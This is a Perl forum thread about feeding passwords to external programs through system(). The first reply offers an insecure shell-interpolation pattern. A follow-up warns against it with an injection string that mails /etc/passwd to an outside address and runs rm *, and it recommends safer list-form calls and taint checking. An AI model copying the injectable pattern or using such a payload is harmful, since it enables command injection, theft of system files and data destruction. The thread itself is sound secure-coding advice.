in reply to passwords and system calls

I hate to say "it depends", but "it depends".

For somethings, you can experiment around with echoing to the command. For example:
system("echo $password | foo -args file");

[download]
Some commands will allow you to put usernames/passwords in files and use those files as input. For example:
system("foo -args file < passwordfile");

[download]
You may also be able to use perl to do some of this echoing. For example:
open(FOO,"| foo -args file");
print FOO "username\n";
print FOO "password\n";
close(FOO);

[download]
You may also want to look into IPC::open2. This allows you to write to a program as well as get information from it.

Finally, you may want to look at the Expect module. This allows you to wait on a particular prompt to which you can respond.

Hopefully, one of the solutions above (or a combination thereof) will help you out. Good luck.

Hope that helps,
Shendal

Update: The above is meant as quick example only. You will, of course, want to do some checking on your system calls before launching any programs, as KM points out in his well-crafted example below.

Replies are listed 'Best First'.
RE: Re: passwords and system calls
by KM (Priest) on Aug 17, 2000 at 23:30 UTC
    system("echo $password | foo -args file");

    bad_system('foo; mail me@me.com < /etc/passwd; rm *');
sub bad_system {
    my $password = shift;
    system("echo $password | foo -args file");
}
#Uh oh!

    [download]

    Please use system() in a safe manner. The way you show here can allow for arbitrary commands to be run. Use in this way:

    system("/bin/echo", "arg1", "arg2");

    [download]

    It is also a good idea to use -T and untaint data before using in a system() command. But, this way of using system() is more secure, and won't use sh. Refer to perldoc -f system and perldoc perlsec

    Cheers,
    KM

[reply]
[d/l]
[select]

In Section Seekers of Perl Wisdom